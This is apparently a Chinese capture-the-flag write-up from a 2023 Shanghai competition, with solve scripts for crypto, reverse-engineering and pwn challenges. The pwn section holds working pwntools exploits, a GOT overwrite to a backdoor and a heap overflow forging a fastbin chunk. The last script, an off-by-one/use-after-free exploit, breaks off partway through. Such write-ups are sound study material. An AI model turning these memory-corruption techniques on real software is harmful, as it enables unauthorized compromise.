2023 第八届上海网络安全大赛部分 wp
crypto
bird
签到题,https://www.dcode.fr/birds-on-a-wire-cipher解一下即可
crackme
送分题。。。
dir_flag
from typing import List
import hashlib
import uuid
import sys
flag = "flag{" + str(uuid.uuid4()) + "}"  # random uuid4 wrapped in the flag format
# uuid4 text is 8-4-4-4-12 hex digits; splitting on "-" yields the five chunks
# that become the Merkle leaves below, each hashed on its own.
flag_split = flag.split("-")
class Node:
    """A Merkle-tree node: two child links plus the hex digest it stores."""

    def __init__(self, left, right, value: str) -> None:
        self.left: Node = left    # None for a leaf
        self.right: Node = right  # None for a leaf
        self.value = value        # hex digest carried by this node

    @staticmethod
    def hash(val: str) -> str:
        """Hex SHA-256 of the UTF-8 encoding of *val* (shadows the builtin on purpose)."""
        digest = hashlib.sha256()
        digest.update(val.encode("utf-8"))
        return digest.hexdigest()

    @staticmethod
    def doubleHash(val: str) -> str:
        """SHA-256 applied twice: the hash of the hex digest of *val*."""
        inner = Node.hash(val)
        return Node.hash(inner)
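class MerkleTree:
    """Binary hash tree over a list of strings.

    Every leaf holds ``Node.doubleHash(value)`` and every inner node holds the
    double hash of ``left.value + right.value``; an odd leaf count is made even
    by repeating the last leaf.  The leaves are unsalted digests of the
    individual inputs, so a leaf whose input has little entropy can be matched
    offline by enumerating candidates (that is how the flag chunks are
    recovered in the write-up below).
    """

    def __init__(self, values: List[str]) -> None:
        """Build the tree over *values*; raises ValueError for an empty list."""
        self.__buildTree(values)

    def __buildTree(self, values: List[str]) -> None:
        # The original recursion never terminates on [] (it keeps splitting an
        # empty list until RecursionError), so reject that input explicitly.
        if not values:
            raise ValueError("MerkleTree needs at least one value")
        leaves: List[Node] = [Node(None, None, Node.doubleHash(e)) for e in values]
        if len(leaves) % 2 == 1:
            leaves.append(leaves[-1])  # duplicate last elem if odd number of elements
        self.root: Node = self.__buildTreeRec(leaves)

    def __buildTreeRec(self, nodes: List[Node]) -> Node:
        """Recursively pair up the non-empty list *nodes* into a single root."""
        if len(nodes) == 1:
            # A lone node is paired with itself, like an odd tail.
            return Node(nodes[0], nodes[0], Node.doubleHash(nodes[0].value + nodes[0].value))
        if len(nodes) == 2:
            return Node(nodes[0], nodes[1], Node.doubleHash(nodes[0].value + nodes[1].value))
        half: int = len(nodes) // 2
        left: Node = self.__buildTreeRec(nodes[:half])
        right: Node = self.__buildTreeRec(nodes[half:])
        return Node(left, right, Node.doubleHash(left.value + right.value))

    def printTree(self) -> None:
        """Print the tree breadth-first, one level per line.

        The output format of the marker-based original is kept: a leading empty
        line, then each level's digests separated by single spaces (with a
        trailing space) and terminated by a newline.
        """
        if not self.root:
            return
        print()
        level: List[Node] = [self.root]
        while level:
            next_level: List[Node] = []
            for node in level:
                print(node.value, end=" ")
                if node.left:
                    next_level.append(node.left)
                if node.right:
                    next_level.append(node.right)
            print()
            level = next_level

    def getRootHash(self) -> str:
        """Return the digest stored in the root node."""
        return self.root.value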
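if __name__ == "__main__":
    import contextlib

    mtree: MerkleTree = MerkleTree(flag_split)
    # redirect_stdout puts sys.stdout back when the block exits; the original
    # assigned sys.stdout = f and left it pointing at the closed file afterwards.
    with open('output.txt', "w") as f, contextlib.redirect_stdout(f):
        print(flag)
        mtree.printTree()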
哈希树的生成,最终的叶子结点内容为flag分隔后的双重哈希值,flag有提示,并且按照uuid的形式进行分割,直接爆破即可
import hashlib
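flag1 = '41a5f7781dc69308b187e24924e0a0a337cdcc36f06b736dd99810eda7bb867b'
flag2 = 'a64cd974e0dbd6f6a289ebd2080ffb6e8ac47f794e02cde4db2239c42f63b6ba'
flag3 = 'e813a50278e41a5ea532c95f99ab616d4ec1ffabad99e1c8fde23886bb600005'
flag4 = '8d4bd8d58ddd11cea747d874e676582bb219b065b2989d96b566f0689a3aaff5'
flag5 = 'e477515e963dc46294e815f9b1887541d225f4b027a7129608302ba8d07faef2'
# flag1..flag5 are the five leaf digests from output.txt: doubleHash() of each
# "-"-separated chunk of the flag, hashed independently and unsalted, which is
# why every chunk can be searched on its own.
table = '0123456789abcdef'  # symbols a uuid4 chunk is made of
#flag{09***********************************755ca2}


def hash(val: str) -> str:
    """Hex SHA-256 of the UTF-8 bytes of *val* (shadows the builtin, as in the challenge)."""
    return hashlib.sha256(val.encode('utf-8')).hexdigest()


def doubleHash(val: str) -> str:
    """SHA-256 of the hex SHA-256 of *val* -- the challenge's leaf function."""
    return hash(hash(val))


def _search(prefix: str, width: int, suffix: str, target: str):
    """Return prefix + mid + suffix for the first *width*-symbol *mid* over
    `table` (same order as the original nested loops) whose doubleHash equals
    *target*; None when nothing matches.  Prints the match like the originals.
    """
    import itertools

    for symbols in itertools.product(table, repeat=width):
        candidate = prefix + "".join(symbols) + suffix
        if doubleHash(candidate) == target:
            print(candidate)
            return candidate
    return None


def crack1(test, target=None):
    """Recover the first chunk: *test* (the known 'flag{09' prefix) followed by
    six unknown symbols.  *target* defaults to flag1."""
    return _search(test, 6, "", flag1 if target is None else target)


def crack2(flag):
    """Recover a four-symbol middle chunk whose leaf digest is *flag*."""
    return _search("", 4, "", flag)


def crack3(test, target=None):
    """Recover the last chunk: six unknown symbols followed by *test* (the
    known '755ca2}' suffix).  *target* defaults to flag5."""
    return _search("", 6, test, flag5 if target is None else target)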
# Assemble the five recovered chunks in flag order: the outer two carry the
# known "flag{09" / "755ca2}" ends, the middle three are plain 4-symbol chunks.
chunks = [
    crack1('flag{09'),
    crack2(flag2),
    crack2(flag3),
    crack2(flag4),
    crack3('755ca2}'),
]
print("".join(chunks))
Twice
from Crypto.Util.number import *
from Crypto.Util.Padding import pad
from secret import flag, a0,a1,b0,b1
def gen_keys(k):
    """Generate the challenge's (pubkey, privkey) pair from three k-bit primes.

    Returns the modulus p**2 * q * r as the public key and the inverse of that
    modulus modulo (p-1)(q-1)(r-1) as the private key.

    NOTE(review): two choices here are what the solve below exploits: the
    private exponent is the inverse of the modulus itself (pubkey * privkey ==
    1 mod phi, so a**(pubkey*privkey) == a mod pqr for a coprime to pqr), and
    (p-1)(q-1)(r-1) is not the totient of p**2 * q * r.
    """
    primes = [getPrime(k) for _ in range(3)]
    p, q, r = primes
    pubkey = p * p * q * r
    phi = (p - 1) * (q - 1) * (r - 1)
    privkey = inverse(pubkey, phi)
    return pubkey, privkey
def encrypt(msg, pubkey):
    """Pad *msg* to a 190-byte block, convert it to an integer and raise it to
    the power *pubkey* modulo *pubkey* (exponent and modulus are the same)."""
    padded = pad(msg, 190)
    m = bytes_to_long(padded)
    return pow(m, pubkey, pubkey)
p = getPrime(512)
q = getPrime(512)
e = getPrime(128)
n1 = p * q
# The secret pairs (a0, b0) and (a1, b1) are two representations of n1 as
# a**2 + e*b**2; the solve below turns them into a factor of n1.
assert pow(a0, 2) + e * pow(b0, 2) == n1
assert pow(a1, 2) + e * pow(b1, 2) == n1
# one: textbook RSA of the flag under (e, n1)
m = bytes_to_long(flag)
c1 = pow(m, e, n1)
# two: the RSA ciphertext is wrapped again with gen_keys()/encrypt()
pub, pri = gen_keys(512)
c2 = encrypt(long_to_bytes(c1), pub)
# Everything including the outer private key is published.
for label, value in (("n1", n1), ("a0", a0), ("a1", a1), ("b0", b0), ("b1", b1),
                     ("c2", c2), ("pub", pub), ("pri", pri)):
    print(f"{label}=", value)
主要就是进行了两次加密,注意到存在两个关系,尝试进行分析
assert pow(a0,2) + e * pow(b0,2) == n1
assert pow(a1,2) + e * pow(b1,2) == n1
因为
a0^2 + e*b0^2 == a1^2 + e*b1^2
a0^2 + e*b0^2 == n
a1^2 + e*b1^2 == n
故有
a0^2*b0^2 + e*b0^2*b0^2 == n*b0^2
a1^2*b1^2 + e*b1^2*b1^2 == n*b1^2
两式相减,n*b0^2-n*b1^2 = a0^2*b0^2 + e*b0^2*b0^2 - (a1^2*b1^2 + e*b1^2*b1^2)
又因为
a0^2*b0^2 + e*b0^2*b0^2 == a1^2*b0^2 + e*b1^2*b0^2
a0^2*b1^2 + e*b0^2*b1^2 == a1^2*b1^2 + e*b1^2*b1^2
n*b0^2-n*b1^2 = a1^2*b0^2 + e*b1^2*b0^2-(a0^2*b1^2 + e*b0^2*b1^2)
即
n*(b0^2-b1^2) = a1^2*b0^2-a0^2*b1^2
n*(b0^2-b1^2) = (a1*b0)^2-(a0*b1)^2
n*(b0^2-b1^2) = (a1*b0+a0*b1)*(a1*b0-a0*b1)
故 a1*b0+a0*b1 与 n 的因子存在关系,对其与 n 取 gcd 即可分解 n
注意到得到公钥的函数存在特殊的地方,也进行分析
n = p**2 * q * r
phi = (p-1) * (q-1) * (r-1)
a^(phi) = 1 mod (pqr)
又因为
n*d = k*phi+1
故
a^(k*phi+1) = a mod (pqr)
a^(n*d) = a mod (pqr)
a^(n*d)-a = k1*pqr
故pqr可求,并可解密文
通过上述分析,可知在目前情况下,满足求flag的情况
from Crypto.Util.number import *
from Crypto.Util.Padding import unpad
from gmpy2 import *
n1 = 87665217778729524993118310155129480311708534438704150676980835344891979982717119161254489670350577173938239682286759779547789055360697960379769693294306641200724257991678505629369338313581657539655057636732714452287023658150014746541718058750871927050204352584824130972892779877896415568548748364583880371427
a0 = 9362970563807702423162361787386216886594085863490420184497563324865248429693287404341206766515622648778272030443641712923250846610046357375553046092690266
a1 = 9362970563807702423162361745963275441706212437133735476965289880825874017106479792816846422940594285630367772490647779230476318907092613021181772527068514
b0 = 74836747076024432741470938222753940689278814091833170112470104078475118700897724833941621360216319460657128947837095907483
b1 = 93520964011413593176393772179429258741894666938448164504029535235899813670669478849381259720656022408302270582527720184427
c2 = 7090659117351297531755883438960933877263181849815568437232708639999747137583085680350909771730266998763362206865224473283130982570816918537377058225538656521223617210560656370841094169187300346437355127376920626133248983100115455529533265136725274741407727211587363755394889303944789720637515498330115070515942678821608630620272575086220037432383957991049220528177053370450234486390431027269543481157974773863005279984438957464388749795275109730696430700744950555993640720758137888948464005039907816169108829675809911658280616090368129767282407708640291466242813209343944276906740181222776418701978734705056220412984
pub = 15393634704241437811571407047965218207529278849238950329420499882359515149154462592674433680412129087082275102567406550543503710118161775213536183656910892279726520148202227312448507629264239427121015706092403872586978266402316447553116208411724407465368711586887621447872002364407809592953543797319646692321612541334341183378900324146713189121105760280994702695266049904020810024990537652609099294535255399210219454610583930829883737909993183476961897889084229322415995483397484414924734020539093114397393070394929656598174957126771887906087335882580049097369036955153036983424389092042285637185882327630117320615769
pri = 424184707992085368727036634979681060339188016631126395371395132791009626692092220877797321952063158959159298372653275672949543326347146732580465753892335912633332743258010037527036987474957662424735475674152462914082526658466925646224968182493094690460023505421720259663381122409147914948696061450626153526908753546708693503710352787787701648821693599138777500334149879355898444355846028142814267511986218166066642222930494985736426837825122392760739011897554697
# Step 1: pub*pri == 1 mod phi, so 2**(pub*pri) == 2 mod pqr and
# gcd(2**(pub*pri) - 2, pub) exposes pqr.
base = 2
pqr = gcd(pow(base, pri * pub, pub) - base, pub)
# Step 2: peel the outer layer and unpad to get c1, the RSA ciphertext of the flag.
inner = unpad(long_to_bytes(pow(c2, pri, pqr)), 190)
c1 = bytes_to_long(inner)
# Step 3: e follows from the first representation n1 = a0**2 + e*b0**2.
e = (n1 - a0 ** 2) // b0 ** 2
# n*(b0^2-b1^2) = (a1*b0+a0*b1)*(a1*b0-a0*b1), so a factor of n1 divides a1*b0+a0*b1.
p = gcd(a1 * b0 + a0 * b1, n1)
q = n1 // p
phi = (p - 1) * (q - 1)
d = invert(e, phi)
print(long_to_bytes(pow(c1, d, n1)))
RSA_like
import random
from Crypto.Util.number import *
def RRSSAA_prime(bit_length):
    """Sample a prime of the form a**2 + 3*b**2 with exactly *bit_length* bits.

    Candidates are drawn until one has the right size, is 1 mod 3 and passes
    isPrime(); draws with 3 | b are discarded.
    NOTE(review): random.getrandbits is the Mersenne Twister, not a CSPRNG, so
    primes generated this way are predictable from the generator state; key
    material should come from secrets/os.urandom.
    """
    half = bit_length // 2
    while True:
        a = random.getrandbits(half)
        b = random.getrandbits(half)
        if b % 3 == 0:
            continue
        candidate = a * a + 3 * b * b
        if (candidate.bit_length() == bit_length
                and candidate % 3 == 1
                and isPrime(candidate)):
            return candidate
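def RRSSAA_add(P, Q, mod):
    """Group-law "addition" of two elements P=(m, n) and Q=(p, q) modulo *mod*.

    Elements are pairs whose second (or both) components may be None: a pair
    with a None first component acts as the identity (it is what
    RRSSAA_power starts from), and (x, None) is a reduced form handled by its
    own branches.  The page does not name the underlying group, so the
    formulas are kept verbatim except for one fix.

    Fix: in the q-is-not-None branch, when (m + p + n*q) is 0 mod *mod* the
    original divided by ``n*p + m*q + r`` with ``r`` undefined (NameError at
    runtime); the guarding elif tests ``n*p + m*q + 2``, so that is the
    intended divisor.
    """
    m, n = P
    p, q = Q
    if p is None:
        return P
    if m is None:
        return Q
    if n is None and q is None:
        return (m * p % mod, (m + p) % mod)
    if n is None and q is not None:
        # Normalise so that the None second component, if any, sits in Q.
        m, n, p, q = p, q, m, n
    if q is None:
        if (n + p) % mod != 0:
            inv = inverse(n + p, mod)
            return ((m * p + 2) * inv % mod, (m + n * p) * inv % mod)
        if (m - n ** 2) % mod != 0:
            return ((m * p + 2) * inverse(m - n ** 2, mod) % mod, None)
        return (None, None)
    if (m + p + n * q) % mod != 0:
        inv = inverse(m + p + n * q, mod)
        return ((m * p + (n + q) * 2) * inv % mod,
                (n * p + m * q + 2) * inv % mod)
    if (n * p + m * q + 2) % mod != 0:
        return ((m * p + (n + q) * 2) * inverse(n * p + m * q + 2, mod) % mod, None)
    return (None, None)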
def RRSSAA_power(P, a, mod):
    """Scalar multiple a*P by right-to-left double-and-add.

    Starts from the identity (None, None) and consumes the bits of *a* least
    significant first; a non-positive *a* returns the identity unchanged.
    """
    acc = (None, None)
    addend = P
    exponent = a
    while exponent > 0:
        if exponent & 1:
            acc = RRSSAA_add(acc, addend, mod)
        addend = RRSSAA_add(addend, addend, mod)
        exponent >>= 1
    return acc
from RRSSAA import *
from Crypto.Util.number import *
from Crypto.Util.Padding import pad
flag = b'xxx'  # placeholder; the real flag is not on the page
l = len(flag)//2
# The flag is split in two halves, each padded to 125 bytes, and the pair is
# encrypted as one group element.
part1 = pad(flag[:l],125)
part2 = pad(flag[l:],125)
p, q = RRSSAA_prime(512), RRSSAA_prime(512)
n = p * q
# I do not give its formula to you, try to find it with some papers.
# (The solve further down uses phi = (p**2 + p + 1) * (q**2 + q + 1).)
phi =
# d is only 360 bits against a ~1024-bit n, which is what makes the
# Boneh-Durfee style lattice attack in the write-up feasible.
d = getPrime(360)
e = inverse(d, phi)
m = (bytes_to_long(part1), bytes_to_long(part2))
c = RRSSAA_power(m, e, n)
print(f"c = {c}")
print(f"n = {n}")
print(f"e = {e}")
基于rsa实现的一套加密系统,之前遇到过类似的,基于Boneh and Durfee attack的二元coppersmith攻击即可分解p,q
import itertools
# Challenge output: c is the encrypted (part1, part2) pair, n = p*q, e the public exponent.
c = (
    59282499553838316432691001891921033515315025114685250219906437644264440827997741343171803974602058233277848973328180318352570312740262258438252414801098965814698201675567932045635088203459793209871900350581051996552631325720003705220037322374626101824017580528639787490427645328264141848729305880071595656587,
    73124265428189389088435735629069413880514503984706872237658630813049233933431869108871528700933941480506237197225068288941508865436937318043959783326445793394371160903683570431106498362876050111696265332556913459023064169488535543256569591357696914320606694493972510221459754090751751402459947788989410441472,
)
n = 114781991564695173994066362186630636631937111385436035031097837827163753810654819119927257768699803252811579701459939909509965376208806596284108155137341543805767090485822262566517029632602553357332822459669677106313003586646066752317008081277334467604607046796105900932500985260487527851613175058091414460877
e = 4252707129612455400077547671486229156329543843675524140708995426985599183439567733039581012763585270550049944715779511394499964854645012746614177337614886054763964565839336443832983455846528585523462518802555536802594166454429110047032691454297949450587850809687599476122187433573715976066881478401916063473308325095039574489857662732559654949752850057692347414951137978997427228231149724523520273757943185561362572823653225670527032278760106476992815628459809572258318865100521992131874267994581991743530813080493191784465659734969133910502224179264436982151420592321568780882596437396523808702246702229845144256038
def small_roots(f, bounds, m=1, d=None):
    """Lattice small-roots finder for a multivariate polynomial f over Z/NZ (SageMath code).

    Note: this is SageMath, not plain Python -- ``^`` is exponentiation here and
    ZZ/QQ/Sequence/prod/power/vector come from Sage.

    Args:
        f: polynomial over Zmod(N) whose small root is wanted.
        bounds: one upper bound per variable; used to scale the lattice columns.
        m: number of powers of f used for the shift polynomials.
        d: highest shift degree per variable; defaults to f.degree().
    Returns:
        A list of root tuples (one entry per variable, as elements of f's base
        ring) when LLL yields a zero-dimensional ideal, otherwise [].
    """
    if not d:
        d = f.degree()
    R = f.base_ring()
    N = R.cardinality()
    # Normalise by the first listed coefficient, then lift to Z for the lattice.
    f /= f.coefficients().pop(0)
    f = f.change_ring(ZZ)
    G = Sequence([], f.parent())
    for i in range(m+1):
        # Shift polynomials N^(m-i) * f^i * (monomial), all vanishing at the root mod N^m.
        base = N ^ (m-i) * f ^ i
        for shifts in itertools.product(range(d), repeat=f.nvariables()):
            g = base * prod(map(power, f.variables(), shifts))
            G.append(g)
    B, monomials = G.coefficient_matrix()
    monomials = vector(monomials)
    # Scale each column by the bound of its monomial, reduce, then unscale.
    factors = [monomial(*bounds) for monomial in monomials]
    for i, factor in enumerate(factors):
        B.rescale_col(i, factor)
    B = B.dense_matrix().LLL()
    B = B.change_ring(QQ)
    for i, factor in enumerate(factors):
        B.rescale_col(i, 1/factor)
    # Collect reduced polynomials until their ideal is zero-dimensional, dropping
    # any that make it trivial (dimension -1).
    H = Sequence([], f.parent().change_ring(QQ))
    for h in filter(None, B*monomials):
        H.append(h)
        I = H.ideal()
        if I.dimension() == -1:
            H.pop()
        elif I.dimension() == 0:
            roots = []
            for root in I.variety(ring=ZZ):
                root = tuple(R(root[var]) for var in f.variables())
                roots.append(root)
            return roots
    return []
# Boneh-Durfee style setup in SageMath syntax (PR.<x,y> and ^ are Sage, not Python).
# With y = p+q and n = pq, the phi used in the solve, (p^2+p+1)(q^2+q+1),
# expands to y^2 + (n+1)*y + (n^2-n+1); e*d = k*phi + 1 then makes
# x*phi + 1 vanish mod e at x = k.  Bounds match the 360-bit d and the
# roughly 512-bit p+q.
PR.<x,y>=PolynomialRing(Zmod(e))
f=x*(y^2 + (n+1)*y + (n^2-n+1)) + 1
bounds=(2^360,2^512)
z = small_roots(f,bounds,m=4,d=4)[0][1]  # y-component of the first root, i.e. p+q
print(z)
#21581081267317264057300397805667850767978100748500497887465036772601909848077661066029306567420215347344093486009661621345217539597125914633479358949462578
然后正常求解一下即可
from RRSSAA import *
from Crypto.Util.number import *
from Crypto.Util.Padding import unpad
from gmpy2 import *
z = 21581081267317264057300397805667850767978100748500497887465036772601909848077661066029306567420215347344093486009661621345217539597125914633479358949462578  # p + q from the Coppersmith step
c = (59282499553838316432691001891921033515315025114685250219906437644264440827997741343171803974602058233277848973328180318352570312740262258438252414801098965814698201675567932045635088203459793209871900350581051996552631325720003705220037322374626101824017580528639787490427645328264141848729305880071595656587, 73124265428189389088435735629069413880514503984706872237658630813049233933431869108871528700933941480506237197225068288941508865436937318043959783326445793394371160903683570431106498362876050111696265332556913459023064169488535543256569591357696914320606694493972510221459754090751751402459947788989410441472)
n = 114781991564695173994066362186630636631937111385436035031097837827163753810654819119927257768699803252811579701459939909509965376208806596284108155137341543805767090485822262566517029632602553357332822459669677106313003586646066752317008081277334467604607046796105900932500985260487527851613175058091414460877
e = 4252707129612455400077547671486229156329543843675524140708995426985599183439567733039581012763585270550049944715779511394499964854645012746614177337614886054763964565839336443832983455846528585523462518802555536802594166454429110047032691454297949450587850809687599476122187433573715976066881478401916063473308325095039574489857662732559654949752850057692347414951137978997427228231149724523520273757943185561362572823653225670527032278760106476992815628459809572258318865100521992131874267994581991743530813080493191784465659734969133910502224179264436982151420592321568780882596437396523808702246702229845144256038
# From s = p+q and n = pq: (p-q)^2 = s^2 - 4n, so both primes follow.
diff = iroot(z ** 2 - 4 * n, 2)[0]
p = (z + diff) // 2
q = z - p
phi = (p * p + p + 1) * (q * q + q + 1)
d = inverse(e, phi)
m = RRSSAA_power(c, d, n)
first_half = unpad(long_to_bytes(m[0]), 125)
second_half = unpad(long_to_bytes(m[1]), 125)
print(first_half + second_half)
revenge
未解出,待研究
reverse
ezez
签到题,去掉花指令,然后smc解密一下得到flag被加密,加密算法为rc4,在线解密一下即可
https://www.toolhelper.cn/SymmetricEncryption/RC4
密文:RQpxxZgUqxzwonBuDApb3PyRJ8CcLIyXVozsVjurmPQdUdND+cly4HFq
密钥VrDQ-ffgaEig04qx
flag在哪?
程序主要的加密验证的代码是放在申请的堆里的,动态跟踪一下,伪代码如下
// Decompiler pseudocode of the routine the write-up found in the heap. The
// locals v3..v15 have no declarations in the listing, so their types are
// unknown. off_4062B4 is called on a1/a2 and its result bounds the loops, so
// it is presumably a strlen-like function -- not confirmed on the page.
char *__cdecl sub_4813E0(int a1, int a2)
{
    v15 = off_4062B4;
    v7 = dword_406448;
    v6 = dword_40644C;
    v14 = off_4062B4(a1);  // length of the first string
    v13 = v15(a2);         // length of the second string
    // First buffer: each byte of a1 XOR 4; at positions with i % 3 == 1 it is
    // additionally XORed with byte_406000[3 * i].
    for ( i = 0; i < v14; ++i )
    {
        v5[i] = *(_BYTE *)(i + a1) ^ 4;
        if ( i % 3 == 1 )
            v5[i] ^= byte_406000[3 * i];
    }
    v5[v14] = 0;
    // Second buffer: each byte of a2 XOR 6, except that odd positions are
    // overwritten with the raw byte a2[j + 7] (reads up to 7 bytes past v13).
    for ( j = 0; j < v13; ++j )
    {
        v4[j] = *(_BYTE *)(j + a2) ^ 6;
        if ( j % 2 == 1 )
            v4[j] = *(_BYTE *)(j + a2 + 7);
    }
    v4[v13] = 0;
    v12 = v3;
    // Called as (v3, sub_401AC0, 4132); looks like a copy of 4132 bytes of
    // sub_401AC0 into v3 -- the page does not confirm this.
    off_406458(v3, sub_401AC0, 4132);
    v9 = v3;
    v10 = v5;
    v11 = v4;
    v8 = v3;
    return v3;
}
然后调用这个函数
// Verification routine called with the user input (Str) and a second string a2.
// Returns 0 on success; otherwise 15 - len for a wrong length, or 1 + the index
// of the first mismatching byte (the early return reveals that position).
int __cdecl sub_19EC64(char *Str, char *a2)
{
    v10 = off_4062B4(Str);  // length must be 15
    v6 = off_4062B4(a2);    // length of "e4bdtRV02"
    off_4062B4(byte_406274);
    v12 = 15;
    v11 = 15 - v10;
    if ( v10 != 15 )  // length must be 15
        return v11;
    for ( i = 0; i < v10; ++i )
    {
        v4 = 0;
        v9 = i % 3;
        v7 = off_406450(i % 3);  // author's note: 1,9 2,8 (values per i % 3; meaning not given on the page)
        v5 = (v7 + 2) ^ Str[i];
        v8 = a2[i];
        if ( i >= v6 )
            v8 = 0;  // a2 is shorter than 15: missing tail bytes count as 0
        v3[i] = v8 + v5;
        if ( v3[i] != byte_406274[i] )
            return i + 1;  // leaks the position of the first mismatch
    }
    return 0;
}
//D3 38 D1 D3 7B AD B3 66 71 3A 59 5F 5F 2D 73 00 FF FF FF FF
然后逆算法解密即可
encryptor
rust写的程序,刚开始看比较懵,但结合字符串,可以大致推出flag被rc4加密,密钥和时间相关,可以进行调试,密钥为时间分钟乘秒,爆破即可
from hashlib import sha256
def rc4_main(key, message):
    """Run RC4 over *message* with *key* and return the output as a str."""
    return str(rc4_excrypt(message, rc4_init_sbox(key)))
def rc4_init_sbox(key):
s_box = list(range(256))
j = 0
for i in range(256):
j = (j + s_box[i] + (key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
return s_box
def rc4_excrypt(plain, box):
    """RC4 PRGA: XOR each byte of *plain* with the keystream drawn from *box*
    (which is permuted in place) and return the result as a str of code points."""
    out = []
    i = j = 0
    for byte in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        keystream = box[(box[i] + box[j]) % 256]
        out.append(chr(byte ^ keystream))
    return "".join(out)
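# The key is sha256(str(minute * second)); minute * second is at most 59 * 59,
# so range(3600) covers every possible key and the search is exhaustive.
with open('flag.txt.enc', 'rb') as fh:  # closed on exit, unlike the bare open().read()
    data = fh.read()
for i in range(3600):
    key = sha256(str(i).encode()).digest()
    flag = rc4_main(key, data)
    if 'flag' in flag:
        print(i)
        print(flag)
        break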
HackedSystem
0解
Trans
0解
pwn
ChangeAddr
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
题目提示较多,存在任意地址4字节的写入,flag相关的函数注册了信号处理函数,在段错误的时候触发,因此劫持一下puts的got,然后触发段错误即可
from pwn_file import *
from pwn_env import *
from pwn_api import *
from sys import argv
from pwn import *
pwn_name = f"./{argv[0][:-3]}"  # script name minus ".py" is the target binary
elf = ELF(pwn_name)
ld_so, libc_so_L, libc_so_R = diffGlibc()
setpwn = SetPwn(ld_so, libc_so_L, libc_so_R, pwn_name)
r, libc = setpwn.pattern()
pwnapi = PwnApi(r, elf)
def pwnme():
    """Redirect puts@GOT to the flag routine, then provoke the fault.

    The write-up describes a 4-byte write to a user-chosen address and a
    fault handler that runs the flag routine; the binary reads the address
    and the value as hex on separate lines.
    """
    puts_got = elf.got['puts']
    print(hex(puts_got))
    back_door = 0x0804932C
    r.recvuntil(b'write?\n')
    r.sendline(f"{puts_got:#x}".encode('utf-8'))
    sleep(0.3)  # give the target time to consume the address before the value
    r.sendline(f"{back_door:#x}".encode('utf-8'))
    r.recvuntil(b'fault!\n')
    r.sendline(b'a' * 0x35)
    r.interactive()
pwnme()  # runs at import time, right after the process/ELF setup above
KeyBox
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
对edit中,对输入的大小没有限制,存在任意长度溢出漏洞,伪造堆(分配的时候控制堆管理器),然后在malloc写入后门函数即可,注意进入菜单之前有个输入密钥的环节,需要绕一下
from pwn_file import *
from pwn_env import *
from pwn_api import *
from sys import argv
from pwn import *
pwn_name = f"./{argv[0][:-3]}"  # strip ".py" from the script name to get the binary
elf = ELF(pwn_name)
ld_so, libc_so_L, libc_so_R = diffGlibc()
setpwn = SetPwn(ld_so, libc_so_L, libc_so_R, pwn_name)
r, libc = setpwn.pattern()
pwnapi = PwnApi(r, elf)
def bypasskey():
    """Answer the two key prompts that gate the menu with the values from the
    write-up (the first one is INT64_MIN + 12)."""
    r.recvuntil(b'Input the first key: \n')
    r.sendline(f"{-9223372036854775796}".encode('utf-8'))
    r.recvuntil(b'Input the second key: \n')
    r.sendline(f"{1}".encode('utf-8'))
def menu(choice):
    """Wait for the menu prompt and send *choice* as decimal text."""
    r.recvuntil(b'Your choice:')
    r.sendline(f"{choice}".encode('utf-8'))
def show(idx):
    """Menu 1 (*idx* is accepted for symmetry with the other helpers but never sent)."""
    menu(1)
def add(size, content):
    """Menu 2: allocate an item of *size* bytes and send its name raw (no newline)."""
    menu(2)
    r.recvuntil(b'Please enter the length of the item:')
    r.sendline(f"{size}".encode('utf-8'))
    r.recvuntil(b'Please enter the name of item:')
    r.send(content)
def edit(idx, size, content):
    """Menu 3: rewrite item *idx* with *size* bytes of *content* (sent with a newline).

    The write-up notes the service does not bound *size* by the item's
    allocation; checking the requested length against the stored size on the
    server side is the missing control.
    """
    menu(3)
    r.recvuntil(b'Please enter the index of item:')
    r.sendline(f"{idx}".encode('utf-8'))
    r.recvuntil(b'Please enter the length of item:')
    r.sendline(f"{size}".encode('utf-8'))
    r.recvuntil(b'Please enter the new name of the item:')
    r.sendline(content)
def delete(idx):
    """Menu 4: free item *idx*."""
    menu(4)
    r.recvuntil(b'Please enter the index of item:')
    r.sendline(f"{idx}".encode('utf-8'))
def pwnme():
    """Exploit flow from the write-up: overflow from item 0 into freed chunks to
    plant a forged 0x71 chunk whose next pointer reaches the item table, then
    point malloc@GOT at the backdoor and trigger a malloc."""
    heap_addr = 0x4040c0
    back_door = 0x401765
    bypasskey()
    for size, name in ((0x7f, 'a'), (0x68, 'b'), (0x68, 'b'), (0x68, 'd')):
        add(size, name)
    delete(2)
    delete(1)
    payload = b"".join([b'a' * 0x80, p64(0), p64(0x71), p64(heap_addr - 0x8)])
    edit(0, 0xa0, payload)
    add(0x68, 'e')
    print(f"[+]malloc_gots:{hex(elf.got['malloc'])}")
    add(0x68, p64(elf.got['malloc']))
    edit(0, 0x20, p64(back_door))
    menu(2)
    r.recvuntil(b'Please enter the length of the item:')
    r.sendline(f"{0x68}".encode('utf-8'))
    r.interactive()
pwnme()  # runs at import time, right after the process/ELF setup above
ssql
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
一个很有意思的题,模拟了mysql,采用双向指针的数据结构,漏洞在编辑的时候存在off-by-one,然后在delete存在uaf,泄露libc然后伪造col,并让next指向它获取任意地址写,覆盖free_hook即可
from pwn_file import *
from pwn_env import *
from pwn_api import *
from sys import argv
from pwn import *
pwn_name = f"./{argv[0][:-3]}"  # binary path derived from the script name without ".py"
elf = ELF(pwn_name)
ld_so, libc_so_L, libc_so_R = diffGlibc()
setpwn = SetPwn(ld_so, libc_so_L, libc_so_R, pwn_name)
r, libc = setpwn.pattern()
pwnapi = PwnApi(r, elf)
def menu(choice):
    """Wait for the SQL-style prompt and send *choice* (a command string) raw, no newline."""
    r.recvuntil('mysql > ')
    r.send(choice)
def add_tab(tab_name):
    """Issue CREATE TABLE for *tab_name*."""
    menu(f'CREATE TABLE {tab_name}')
def add_col(tab_name, col_name):
    """Create column *col_name* in table *tab_name*."""
    menu(f'CREATE {col_name} FROM {tab_name}')
def edit(tab_name, col_name, name, content):
    """EDIT *col_name* of *tab_name*: send the new column name, then its content.

    The write-up places the off-by-one in this handler; a bounds check on the
    content length against the column buffer is the missing control.
    """
    menu(f'EDIT {col_name} FROM {tab_name}')
    r.recvuntil('Column name:')
